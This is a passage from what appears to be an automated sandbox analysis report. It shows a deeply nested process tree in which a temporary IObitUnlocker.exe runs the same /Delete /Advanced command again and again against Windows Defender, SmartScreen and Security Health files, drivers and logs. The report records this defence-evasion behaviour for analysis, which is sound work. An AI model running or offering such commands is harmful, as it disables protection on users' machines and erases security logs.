Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:12112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11520
